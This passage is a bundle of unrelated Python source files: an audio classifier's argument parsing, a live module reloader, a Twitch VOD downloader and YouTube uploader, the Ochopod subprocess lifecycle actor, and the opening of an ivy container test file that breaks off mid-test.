arg_parser.add_argument("--vad", help="Use given vad.ell model to determine when to reset the classifier")
arg_parser.add_argument("--smoothing", help="Use a smoothing buffer over preditions specifying 'vad' to smooth "
"based on VAD signal, or with a fixed number of previous N predictions (default None)")
arg_parser.add_argument("--ignore_list",
help="comma separated list of category labels to ignore (like 'background' or 'silence')")
args = arg_parser.parse_args()
if args.serial and args.input_device:
raise Exception("The --serial and --input_device options are mutually exclusive")
if args.list_devices:
microphone.list_devices()
else:
main(args.featurizer, args.classifier, args.auto_scale,
args.sample_rate, args.channels, args.input_device, args.categories,
args.image_width, args.threshold, args.wav_file, args.clear, args.serial, args.vad, args.smoothing,
args.ignore_list)
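# Example invocation (the model and wav file names here are hypothetical):
#   python view_audio.py --featurizer featurizer.ell --classifier classifier.ell \
#       --categories categories.txt --wav_file test.wav --threshold 0.6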
|
aoiklivereload.py
|
# coding: utf-8
"""
Live reloader that detects module file changes and reloads the program.
"""
from __future__ import absolute_import
# Standard imports
import os
import subprocess
import sys
import threading
import time
# External imports
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
try:
# Python 3
from _thread import interrupt_main
except ImportError:
# Python 2
from thread import interrupt_main
# Version
__version__ = '0.1.0'
# Public attributes
__all__ = (
'LiveReloader',
)
class LiveReloader(FileSystemEventHandler):
"""
Live reloader that detects module file changes and reloads the program.
"""
# Reload mode constants
RELOAD_MODE_V_EXEC = 'exec'
RELOAD_MODE_V_SPAWN_EXIT = 'spawn_exit'
RELOAD_MODE_V_SPAWN_WAIT = 'spawn_wait'
RELOAD_MODE_VALUES = (
RELOAD_MODE_V_EXEC,
RELOAD_MODE_V_SPAWN_EXIT,
RELOAD_MODE_V_SPAWN_WAIT,
)
def __init__(
self,
reload_mode=None,
force_exit=False,
extra_paths=None,
interval=1,
):
"""
Constructor.
:param reload_mode:
Reload mode.
Default is 'spawn_wait' for Windows and 'exec' otherwise.
Notice `exec` reload mode will crash on Windows.
Allowed values:
- 'exec': Replace the current process with a new process.
- 'spawn_exit': Spawn a subprocess, the current process exits.
- 'spawn_wait': Spawn a subprocess, the current process waits.
:param force_exit:
            In `spawn_exit` mode, whether to call `os._exit` to force the \
            current process to terminate immediately. Default is False.
:param extra_paths:
Extra file paths to watch for changes.
:param interval:
Sleep interval between two change checks, in seconds.
:return:
None.
"""
# If reload mode is not given
if reload_mode is None:
# If in Windows
if sys.platform == 'win32':
# Use default `spawn_wait`
reload_mode = self.RELOAD_MODE_V_SPAWN_WAIT
# If not in Windows
else:
# Use default `exec`
reload_mode = self.RELOAD_MODE_V_EXEC
# If reload mode is not valid
if reload_mode not in self.RELOAD_MODE_VALUES:
# Get error message
error_msg = 'Invalid reload mode: {}.'.format(repr(reload_mode))
# Raise error
raise ValueError(error_msg)
# Store reload mode
self._reload_mode = reload_mode
# Store whether force exit
self._force_exit = bool(force_exit)
# Convert given extra paths to absolute
self._extra_paths = set(
os.path.abspath(x) for x in (extra_paths or ())
)
# Store check interval
self._interval = interval
# Set of watch paths
self._watch_paths = set()
# Whether the watcher thread should stop
self._watcher_to_stop = False
def start_watcher_thread(self):
"""
Start watcher thread.
:return:
Watcher thread object.
"""
# Create watcher thread
watcher_thread = threading.Thread(target=self.run_watcher)
# If the reload mode is `spawn_wait`
if self._reload_mode == self.RELOAD_MODE_V_SPAWN_WAIT:
# Use non-daemon thread
daemon = False
# If the reload mode is not `spawn_wait`
else:
# Use daemon thread
daemon = True
# Set whether the thread is daemon
        watcher_thread.daemon = daemon
# Start watcher thread
watcher_thread.start()
# Return watcher thread
return watcher_thread
def run_watcher(self):
"""
Watcher thread's function.
:return:
None.
"""
# Create observer
observer = Observer()
# Start observer
observer.start()
# Dict that maps file path to `watch object`
watche_obj_map = {}
# Run change check in a loop
while not self._watcher_to_stop:
# Get current watch paths
old_watch_path_s = set(watche_obj_map)
# Get new watch paths
new_watch_path_s = self._find_watch_paths()
# For each new watch path
for new_watch_path in new_watch_path_s:
# Remove from the old watch paths if exists
old_watch_path_s.discard(new_watch_path)
# If the new watch path was not watched
if new_watch_path not in watche_obj_map:
try:
# Schedule a watch
watch_obj = observer.schedule(
# 2KGRW
# `FileSystemEventHandler` instance
self,
# File path to watch
new_watch_path,
# Whether recursive
recursive=True,
)
# Store the watch obj
watche_obj_map[new_watch_path] = watch_obj
# If have error
except OSError:
# Set the watch object be None
watche_obj_map[new_watch_path] = None
# For each old watch path that is not in the new watch paths
for old_watch_path in old_watch_path_s:
# Get watch object
watch_obj = watche_obj_map.pop(old_watch_path, None)
# If have watch object
if watch_obj is not None:
# Unschedule the watch
observer.unschedule(watch_obj)
# Store new watch paths
self._watch_paths = new_watch_path_s
# Sleep before next check
time.sleep(self._interval)
def _find_watch_paths(self):
"""
Find paths to watch.
:return:
Paths to watch.
"""
# Add directory paths in `sys.path` to watch paths
watch_path_s = set(os.path.abspath(x) for x in sys.path)
# For each extra path
for extra_path in self._extra_paths or ():
# Get the extra path's directory path
extra_dir_path = os.path.dirname(os.path.abspath(extra_path))
# Add to watch paths
watch_path_s.add(extra_dir_path)
# For each module in `sys.modules`
for module in list(sys.modules.values()):
# Get module file path
module_path = getattr(module, '__file__', None)
# If have module file path
if module_path is not None:
# Get module directory path
module_dir_path = os.path.dirname(os.path.abspath(module_path))
# Add to watch paths
watch_path_s.add(module_dir_path)
# Find short paths of these watch paths.
# E.g. if both `/home` and `/home/aoik` exist, only keep `/home`.
watch_path_s = self._find_short_paths(watch_path_s)
# Return the watch paths
return watch_path_s
def _find_short_paths(self, paths):
"""
Find short paths of given paths.
E.g. if both `/home` and `/home/aoik` exist, only keep `/home`.
:param paths:
Paths.
:return:
Set of short paths.
"""
# Split each path to parts.
# E.g. '/home/aoik' to ['', 'home', 'aoik']
path_parts_s = [path.split(os.path.sep) for path in paths]
# Root node
root_node = {}
# Sort these path parts by length, with the longest being the first.
#
# Longer paths appear first so that their extra parts are discarded
# when a shorter path is found at 5TQ8L.
#
# Then for each path's parts.
for parts in sorted(path_parts_s, key=len, reverse=True):
# Start from the root node
node = root_node
# For each part of the path
for part in parts:
# Create node of the path
node = node.setdefault(part, {})
# 5TQ8L
# Clear the last path part's node's child nodes.
#
# This aims to keep only the shortest path that needs be watched.
#
node.clear()
# Short paths
short_path_s = set()
# Collect leaf paths
self._collect_leaf_paths(
node=root_node,
path_parts=(),
leaf_paths=short_path_s,
)
# Return short paths
return short_path_s
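    # For example, _find_short_paths({'/home', '/home/aoik', '/var/log'})
    # returns {'/home', '/var/log'}: watching '/home' already covers
    # '/home/aoik', so the longer path is dropped.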
def _collect_leaf_paths(self, node, path_parts, leaf_paths):
"""
Collect paths of leaf nodes.
:param node:
Starting node. Type is dict.
Key is child node's path part. Value is child node.
:param path_parts:
The starting node's path parts. Type is tuple.
:param leaf_paths:
            Set that collects the leaf node paths (modified in place).
:return:
None.
"""
# If the node is leaf node
if not node:
# Get node path
node_path = '/'.join(path_parts)
# Add to list
leaf_paths.add(node_path)
# If the node is not leaf node
else:
# For each child node
for child_path_part, child_node in node.items():
# Get the child node's path parts
child_path_part_s = path_parts + (child_path_part,)
# Visit the child node
self._collect_leaf_paths(
node=child_node,
path_parts=child_path_part_s,
leaf_paths=leaf_paths,
)
def dispatch(self, event):
"""
Dispatch file system event.
Callback called when there is a file system event. Hooked at 2KGRW.
This function overrides `FileSystemEventHandler.dispatch`.
:param event:
File system event object.
:return:
None.
"""
# Get file path
file_path = event.src_path
# If the file path is in extra paths
if file_path in self._extra_paths:
# Call `reload`
self.reload()
# If the file path ends with `.pyc` or `.pyo`
if file_path.endswith(('.pyc', '.pyo')):
# Get `.py` file path
file_path = file_path[:-1]
# If the file path ends with `.py`
if file_path.endswith('.py'):
# Get the file's directory path
file_dir = os.path.dirname(file_path)
# If the file's directory path starts with any of the watch paths
if file_dir.startswith(tuple(self._watch_paths)):
# Call `reload`
self.reload()
def reload(self):
"""
Reload the program.
:return:
None.
"""
# Get reload mode
reload_mode = self._reload_mode
# If reload mode is `exec`
if self._reload_mode == self.RELOAD_MODE_V_EXEC:
# Call `reload_using_exec`
self.reload_using_exec()
# If reload mode is `spawn_exit`
elif self._reload_mode == self.RELOAD_MODE_V_SPAWN_EXIT:
# Call `reload_using_spawn_exit`
self.reload_using_spawn_exit()
# If reload mode is `spawn_wait`
elif self._reload_mode == self.RELOAD_MODE_V_SPAWN_WAIT:
# Call `reload_using_spawn_wait`
self.reload_using_spawn_wait()
# If reload mode is none of above
else:
# Get error message
error_msg = 'Invalid reload mode: {}.'.format(repr(reload_mode))
# Raise error
raise ValueError(error_msg)
def reload_using_exec(self):
"""
Reload the program process.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Reload the program process
os.execvpe(
# Program file path
sys.executable,
# Command parts
cmd_parts,
# Env dict
env_copy,
)
def reload_using_spawn_exit(self):
"""
Spawn a subprocess and exit the current process.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Spawn subprocess
subprocess.Popen(cmd_parts, env=env_copy, close_fds=True)
# If need force exit
if self._force_exit:
# Force exit
os._exit(0) # pylint: disable=protected-access
# If not need force exit
else:
# Send interrupt to main thread
interrupt_main()
# Set the flag
self._watcher_to_stop = True
# Exit the watcher thread
sys.exit(0)
def reload_using_spawn_wait(self):
"""
Spawn a subprocess and wait until it finishes.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Send interrupt to main thread
interrupt_main()
# Spawn subprocess and wait until it finishes
subprocess.call(cmd_parts, env=env_copy, close_fds=True)
# Exit the watcher thread
sys.exit(0)
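# Minimal usage sketch: create a reloader and start its watcher thread before
# entering the program's main loop, e.g.
#
#     from aoiklivereload import LiveReloader
#
#     reloader = LiveReloader()
#     reloader.start_watcher_thread()
#     # ... run the server or main loop here ...
#
# The watcher monitors the directories of `sys.path`, loaded modules and any
# `extra_paths`, and reloads the process when a watched `.py` file changes.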
|
vodloader.py
|
from twitchAPI.types import VideoType
from time import sleep
from threading import Thread
import logging
from vodloader_video import vodloader_video
from vodloader_status import vodloader_status
from youtube_uploader import YouTubeOverQuota, youtube_uploader
import datetime
import pytz
import os
class vodloader(object):
def __init__(self, channel, twitch, webhook, twitch_config, yt_json, download_dir, keep=False, upload=True, sort=True, quota_pause=True, tz=pytz.timezone("America/Chicago")):
self.end = False
self.channel = channel
self.logger = logging.getLogger(f'vodloader.{self.channel}')
self.logger.info(f'Setting up vodloader for {self.channel}')
self.tz = tz
self.download_dir = download_dir
self.keep = keep
self.twitch = twitch
self.webhook = webhook
self.upload = upload
self.quota_pause = quota_pause
if self.upload:
self.uploader = youtube_uploader(self, yt_json, twitch_config['youtube_param'], sort)
if self.uploader.sort:
self.uploader.sort_playlist(twitch_config['youtube_param']['playlistId'])
else:
self.uploader = None
self.user_id = self.get_user_id()
self.status = vodloader_status(self.user_id)
self.sync_status()
self.get_live()
self.webhook_subscribe()
if 'chapters' in twitch_config and twitch_config['chapters'] != "":
self.chapters_type = twitch_config['chapters']
else:
self.chapters_type = False
if 'quality' in twitch_config and twitch_config['quality'] != "":
self.quality = twitch_config['quality']
else:
self.quality = 'best'
if 'backlog' in twitch_config and twitch_config['backlog']:
self.backlog = twitch_config['backlog']
else:
self.backlog = False
if self.backlog:
self.backlog_process = Thread(target=self.backlog_buffload, args=(), daemon=True)
self.backlog_process.start()
def __del__(self):
self.webhook_unsubscribe()
def callback_stream_changed(self, uuid, data):
self.logger.info(f'Received webhook callback for {self.channel}')
if data['type'] == 'live':
if not self.live:
self.live = True
self.logger.info(f'{self.channel} has gone live!')
url = 'https://www.twitch.tv/' + self.channel
self.livestream = vodloader_video(self, url, data, backlog=False, quality=self.quality)
else:
self.live = True
if self.livestream.chapters.get_current_game() != data["game_name"]:
self.logger.info(f'{self.channel} has changed game to {data["game_name"]}')
if self.livestream.chapters.get_current_title() != data["title"]:
self.logger.info(f'{self.channel} has changed their title to {data["title"]}')
self.livestream.chapters.append(data['game_name'], data['title'])
else:
self.live = False
self.logger.info(f'{self.channel} has gone offline')
def get_live(self):
data = self.twitch.get_streams(user_id=self.user_id)
if not data['data']:
self.live = False
elif data['data'][0]['type'] == 'live':
self.live = True
else:
self.live = False
return self.live
def webhook_unsubscribe(self):
if self.webhook_uuid:
success = self.webhook.unsubscribe(self.webhook_uuid)
if success:
self.webhook_uuid = ''
self.logger.info(f'Unsubscribed from webhook for {self.channel}')
return success
def webhook_subscribe(self):
success, uuid = self.webhook.subscribe_stream_changed(self.user_id, self.callback_stream_changed)
if success:
self.webhook_uuid = uuid
self.logger.info(f'Subscribed to webhook for {self.channel}')
else:
self.webhook_uuid = None
return success
def get_user_id(self):
user_info = self.twitch.get_users(logins=[self.channel])
return user_info['data'][0]['id']
def sync_status(self):
ids = []
for id in self.status.copy():
if self.status[id] == False:
if not os.path.isfile(os.path.join(self.download_dir, f'{id}.ts')):
self.status.pop(id)
try:
for video in self.uploader.get_channel_videos():
if video['tvid']:
if video['part'] and video['part'] > 1:
ids.append(f'{video["tvid"]}p{video["part"]}')
else:
ids.append(str(video['tvid']))
for id in self.status.copy():
if not id in ids and self.status[id] == True:
self.status.pop(id)
for id in ids:
self.status[id] = True
self.logger.debug('Status synced with YouTube uploads')
except YouTubeOverQuota:
self.logger.error("YouTube quota is exceeded, can't sync status")
self.status.save()
def get_twitch_videos(self, video_type=VideoType.ARCHIVE):
cursor = None
videos = []
while True:
data = self.twitch.get_videos(user_id=self.user_id, first=100, after=cursor)
for video in data['data']:
if video['type'] == video_type:
videos.append(video)
if not 'cursor' in data['pagination']:
break
else:
cursor = data['pagination']['cursor']
return videos
def backlog_buffload(self):
videos = self.get_twitch_videos()
videos.sort(reverse=False, key=lambda x: datetime.datetime.strptime((x['created_at']), '%Y-%m-%dT%H:%M:%SZ'))
for video in videos:
if self.end: exit()
if self.uploader.pause and self.quota_pause:
self.logger.info('Pausing backlog processing until YouTube quota is refreshed')
while self.uploader.pause:
sleep(10)
self.backlog_video = vodloader_video(self, video['url'], video, backlog=True, quality=self.quality)
self.backlog_video.thread.join()
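
# --- Illustrative sketch, not part of the original module ---
# Hedged example of how a single channel might be wired up; the channel name, config
# keys and file paths below are made up, and `twitch` / `webhook` stand in for
# already-authenticated twitchAPI client and webhook objects created elsewhere.
def _example_setup(twitch, webhook, channel_config):
    """Illustrative only: construct a vodloader for one hypothetical channel."""
    return vodloader(
        channel='somestreamer',
        twitch=twitch,
        webhook=webhook,
        twitch_config=channel_config,
        yt_json='youtube_client_secret.json',
        download_dir='/data/vods',
        keep=False,
        upload=True,
    )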
|
piped.py
|
#
# Copyright (c) 2015 Autodesk Inc.
# All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import pykka
import time
import os
from collections import deque
from copy import deepcopy
from ochopod.api import Cluster, Piped
from ochopod.core.core import SAMPLING
from ochopod.core.fsm import Aborted, FSM, diagnostic
from pykka import ThreadingFuture
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
#: Our ochopod logger.
logger = logging.getLogger('ochopod')
class _Cluster(Cluster):
"""
Wrapper packaging the leader information in a user-friendly way and providing a dependency lookup
helper.
"""
def __init__(self, js):
super(_Cluster, self).__init__()
self.key = js['key']
self.pods = js['pods']
self.dependencies = js['dependencies']
self.index = sorted(self.pods.keys()).index(self.key)
self.seq = self.pods[self.key]['seq']
self.size = len(self.pods)
def grep(self, dependency, port, public=False):
if not dependency in self.dependencies:
return ''
out = []
nodes = self.dependencies[dependency]
for node in nodes.values():
ip = node['public' if public else 'ip']
assert str(port) in node['ports'], 'pod from %s not exposing port %d ?' % (dependency, port)
out.append('%s:%d' % (ip, node['ports'][str(port)]))
return ','.join(out)
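    # Illustrative note (added): for a hypothetical 'kafka' dependency whose two pods
    # remap internal port 9092, grep('kafka', 9092) would render something like
    # '10.169.23.4:31002,10.169.23.8:31017' (addresses made up); public=True swaps in
    # the public IPs instead.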
class Actor(FSM, Piped):
"""
Implementation for our pod life-cycle, managing an underlying sub-process.
"""
def __init__(self, env, latch, hints):
super(Actor, self).__init__()
self.commands = deque()
self.env = env
self.hints = hints
self.hints['process'] = 'stopped'
self.initialized = 0
self.last = {}
self.latches.append(latch)
self.path = 'lifecycle (piped process)'
self.start = hints['start'] == 'true'
self.terminate = 0
def initialize(self):
pass
def can_configure(self, js):
pass
def configured(self, js):
pass
def sanity_check(self, process):
pass
def finalize(self):
pass
def configure(self, js):
#
# - this is the only method that *must* be implemented by the user
#
raise NotImplementedError
def tear_down(self, running):
#
# - simply send by default a SIGTERM to the underlying process
# - this should be good enough in the vast majority of cases
#
running.terminate()
def initial(self, data):
data.checks = self.checks
data.command = None
data.failed = 0
data.pids = 0
data.js = {}
data.next_sanity_check = 0
data.sub = None
return 'spin', data, 0
def reset(self, data):
if data.sub and data.sub.poll() is None:
#
# - the state-machine will often be reset on purpose
# - this happens when we need to first terminate the process
#
try:
logger.info('%s : tearing down process %s' % (self.path, data.sub.pid))
self.hints['process'] = 'terminating'
self.tear_down(data.sub)
except Exception as _:
pass
#
# - we now need to poll until the sub-process is deemed dead (if it is
# running at this point)
#
data.reset_at = time.time()
return 'wait_for_termination', data, 0
def wait_for_termination(self, data):
elapsed = time.time() - data.reset_at
if data.sub:
#
# - check whether or not the process is still running
# - it may take some time (especially in term of graceful shutdown)
#
if data.sub.poll() is None:
if elapsed < self.grace:
#
# - not done yet, spin
#
return 'wait_for_termination', data, SAMPLING
elif self.soft:
#
# - if the soft switch is on bypass the SIGKILL completely
# - this is a special case to handle peculiar scenarios
#
logger.info('%s: bypassing the forced termination (leaking pid %s)...' % (self.path, data.sub.pid))
else:
#
# - the process is stuck, force a SIGKILL
# - silently trap any failure
#
logger.info('%s : pid %s not terminating, killing it' % (self.path, data.sub.pid))
try:
data.sub.kill()
except Exception as _:
pass
else:
logger.debug('%s : pid %s terminated in %d seconds' % (self.path, data.sub.pid, int(elapsed)))
data.sub = None
self.hints['process'] = 'stopped'
return 'spin', data, 0
def spin(self, data):
if self.terminate:
if not data.sub:
#
# - kill the actor (which will release the latch and unlock the main loop)
#
self.exitcode()
else:
#
# - this will force a reset and make sure we kill the process
# - we'll loop back to spin() in any case and exitcode() this time
#
raise Aborted('terminating')
elif self.commands:
#
# - we have at least one request pending
            # - pop the next command and run it (e.g. switch the state-machine to it)
#
req, js, latch = self.commands[0]
data.js = js
data.latch = latch
return req, data, 0
elif data.sub:
#
# - check if the process is still running
#
now = time.time()
if data.sub.poll() is None:
if now >= data.next_sanity_check:
#
# - schedule the next sanity check
# - assert if the process aborted since the last one
#
data.next_sanity_check = now + self.check_every
try:
assert not data.failed, \
'%s : too many process failures (%d since last check)' % (self.path, data.failed)
js = self.sanity_check(data.sub.pid)
self.hints['metrics'] = {} if js is None else js
data.checks = self.checks
data.failed = 0
except Exception as failure:
#
# - any failure trapped during the sanity check will decrement our counter
# - eventually the process is stopped (up to the user to decide what to do)
#
data.checks -= 1
data.failed = 0
logger.warning('%s : sanity check (%d/%d) failed -> %s' %
(self.path, self.checks - data.checks, self.checks, diagnostic(failure)))
if not data.checks:
logger.warning('%s : turning pod off' % self.path)
data.checks = self.checks
self._request(['off'])
else:
code = data.sub.returncode
if not code:
#
# - a successful exit code (0) will automatically force a shutdown
                    # - this is a convenient way for pods to go down automatically once their task is done
#
logger.error('%s : pid %s exited, shutting down' % (self.path, data.sub.pid))
self._request(['kill'])
else:
#
# - the process died on a non zero exit code
# - increment the failure counter (too many failures in a row will fail the sanity check)
# - restart it gracefully
#
data.failed += 1
logger.error('%s : pid %s died (code %d), re-running' % (self.path, data.sub.pid, code))
self._request(['off', 'on'])
else:
#
# - reset by default the metrics if the sub-process is not running
#
self.hints['metrics'] = {}
return 'spin', data, SAMPLING
def on(self, data):
if data.sub and data.js and (self.strict or data.js['dependencies'] != self.last['dependencies']):
#
# - if we already have a process, we want to re-configure -> force a reset first
# - this will go through a graceful termination process
# - we'll come back here afterwards (with data.sub set to None)
#
raise Aborted('resetting to terminate pid %s first' % data.sub.pid)
elif data.sub:
#
# - the process is already running, fail gracefully on a 200
            # - this is the code-path used for instance upon a leader request when strict is false
#
reply = {}, 200
logger.debug('%s : skipping /control/on request' % self.path)
data.latch.set(reply)
else:
#
# - no more process running, go on with the configuration
#
try:
if not self.initialized:
#
                    # - if this is the 1st time the pod is running, invoke the initialize() callback
# - this is typically used to run once-only stuff such as attaching storage volumes, etc.
#
logger.info('%s : initializing pod' % self.path)
self.initialize()
self.initialized = 1
if data.js:
#
# - run the configuration procedure if we have some json
# - we'll use whatever it returns to popen() a new process
# - keep track of the shell command line returned by configure() for later
# - make sure the optional overrides set by configure() are strings
#
cluster = _Cluster(data.js)
logger.info('%s : configuring pod %d/%d' % (self.path, 1 + cluster.index, cluster.size))
data.command, overrides = self.configure(cluster)
data.env = {key: str(value) for key, value in overrides.items()}
self.last = data.js
assert data.command, 'request to start process while not yet configured (user error ?)'
#
# - spawn a new sub-process if the auto-start flag is on OR if we already ran at least once
# - the start flag comes from the $ochopod_start environment variable
#
if not data.js or self.start or data.pids > 0:
#
# - combine our environment variables with the overrides from configure()
# - popen() the new process and log stdout/stderr in a separate thread if required
# - make sure to set close_fds in order to avoid sharing the flask socket with the subprocess
# - reset the sanity check counter
# - keep track of its pid to kill it later on
#
env = deepcopy(self.env)
env.update(data.env)
tokens = data.command if self.shell else data.command.split(' ')
if self.pipe_subprocess:
#
# - set the popen call to use piping if required
# - spawn an ancillary thread to forward the lines to our logger
# - this thread will go down automatically when the sub-process does
#
data.sub = Popen(tokens,
close_fds=True,
cwd=self.cwd,
env=env,
shell=self.shell,
stderr=STDOUT,
stdout=PIPE)
def _pipe(process):
while True:
line = process.stdout.readline().rstrip('\n')
code = process.poll()
if line == '' and code is not None:
break
logger.info('pid %s : %s' % (process.pid, line))
out = Thread(target=_pipe, args=(data.sub,))
out.daemon = True
out.start()
else:
#
# - default popen call without piping
#
data.sub = Popen(tokens,
close_fds=True,
cwd=self.cwd,
env=env,
shell=self.shell)
data.pids += 1
data.next_sanity_check = 0
self.hints['process'] = 'running'
logger.info('%s : popen() #%d -> started <%s> as pid %s' % (self.path, data.pids, data.command, data.sub.pid))
if data.env:
unrolled = '\n'.join(['\t%s -> %s' % (k, v) for k, v in data.env.items()])
logger.debug('%s : extra environment for pid %s ->\n%s' % (self.path, data.sub.pid, unrolled))
reply = {}, 200
data.latch.set(reply)
except Exception as failure:
#
# - any failure trapped during the configuration -> HTTP 406
# - the pod will shutdown automatically as well
#
reply = {}, 406
logger.warning('%s : failed to configure -> %s, shutting down' % (self.path, diagnostic(failure)))
self._request(['kill'])
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def check(self, data):
try:
#
            # - simply invoke the user-defined readiness check (typically used to make sure all
            # the required dependencies are available before starting anything)
#
reply = {}, 200
cluster = _Cluster(data.js)
self.can_configure(cluster)
data.latch.set(reply)
except Exception as failure:
#
# - any failure trapped during the configuration -> HTTP 406
#
reply = {}, 406
logger.warning('%s : failed to run the pre-check -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def off(self, data):
#
# - the /stop request does basically nothing
# - it only guarantees we terminate the process
#
if data.sub:
raise Aborted('resetting to terminate pid %s' % data.sub.pid)
reply = {}, 200
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def kill(self, data):
#
# - the /kill request will first guarantee we terminate the process
#
if data.sub:
raise Aborted('resetting to terminate pid %s' % data.sub.pid)
try:
#
# - invoke the optional finalize() callback
#
logger.info('%s : finalizing pod' % self.path)
self.finalize()
except Exception as failure:
#
# - log something if for some reason finalize() failed as we can't really recover
# - don't bother responding with a 406
#
logger.warning('%s : failed to finalize -> %s' % (self.path, diagnostic(failure)))
#
# - in any case request a termination and tag the pod as 'dead'
#
reply = {}, 200
self.terminate = 1
self.hints['process'] = 'dead'
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def signal(self, data):
try:
logger.debug('%s : user signal received' % self.path)
js = self.signaled(data.js, process=data.sub)
reply = js if js else {}, 200
except Exception as failure:
#
# - abort on a 500 upon any failure
#
reply = {}, 500
logger.warning('%s : failed to signal -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def ok(self, data):
try:
assert data.js, 'control/ok received out of context (leader bug ?)'
logger.debug('%s : cluster has been formed, invoking configured()' % self.path)
cluster = _Cluster(data.js)
self.configured(cluster)
reply = {}, 200
except Exception as failure:
#
# - abort on a 500 upon any failure
#
reply = {}, 500
            logger.warning('%s : failed to invoke configured() -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def specialized(self, msg):
assert 'request' in msg, 'bogus message received ?'
req = msg['request']
if req in ['check', 'on', 'off', 'ok', 'kill', 'signal']:
#
# - we got a request from the leader or the CLI
# - pile it in the FIFO along with its latch
#
js = {}
try:
js = json.loads(msg['data'])
except ValueError:
pass
self.commands.append((req, js, msg['latch']))
else:
super(Actor, self).specialized(msg)
def _request(self, tokens):
#
        # - we use this helper to schedule commands internally (mostly used to switch
# the pod on/off)
#
for token in tokens:
self.commands.append((token, {}, ThreadingFuture()))
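
# --- Illustrative sketch, not part of the original module ---
# configure() is the only callback a user has to implement (see above). The class below
# is a hedged, minimal example of such an override: the 'zookeeper' dependency, the port
# and the command line are all made up. configure() returns the shell command to popen()
# plus a dict of environment overrides (values are stringified by on()).
class _ExampleStrategy(Actor):

    def configure(self, cluster):

        #
        # - look up a hypothetical dependency and render its peers as 'ip:port,...'
        #   using the _Cluster.grep() helper defined above
        #
        peers = cluster.grep('zookeeper', 2181)

        #
        # - return the command to run plus extra environment variables for the child process
        #
        return 'python -u server.py', {'ZK_CONNECT': peers, 'POD_INDEX': cluster.index}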
|
test_container.py
|
# global
import os
import queue
import pickle
import pytest
import random
import numpy as np
import multiprocessing
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(dev, call):
container_0 = Container({'a': [ivy.array([1], dev=dev)],
'b': {'c': [ivy.array([2], dev=dev)], 'd': [ivy.array([3], dev=dev)]}})
container_1 = Container({'a': [ivy.array([4], dev=dev)],
'b': {'c': [ivy.array([5], dev=dev)], 'd': [ivy.array([6], dev=dev)]}})
container_list_joined = ivy.Container.list_join([container_0, container_1])
assert np.allclose(ivy.to_numpy(container_list_joined['a'][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['c'][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['d'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined['a'][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['c'][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['d'][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[1]), np.array([6]))
def test_container_list_stack(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_list_stacked = ivy.Container.list_stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_list_stacked['a'][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['c'][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['d'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked['a'][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['c'][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['d'][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[1]), np.array([6]))
def test_container_unify(dev, call):
# devices and containers
devs = list()
dev0 = dev
devs.append(dev0)
conts = dict()
conts[dev0] = Container(
{'a': ivy.array([1], dev=dev0),
'b': {'c': ivy.array([2], dev=dev0), 'd': ivy.array([3], dev=dev0)}})
if 'gpu' in dev and ivy.num_gpus() > 1:
idx = ivy.num_gpus() - 1
dev1 = dev[:-1] + str(idx)
devs.append(dev1)
conts[dev1] = Container(
{'a': ivy.array([4], dev=dev1),
'b': {'c': ivy.array([5], dev=dev1), 'd': ivy.array([6], dev=dev1)}})
# test
container_unified = ivy.Container.unify(ivy.MultiDevItem(conts), dev0, 'concat', 0)
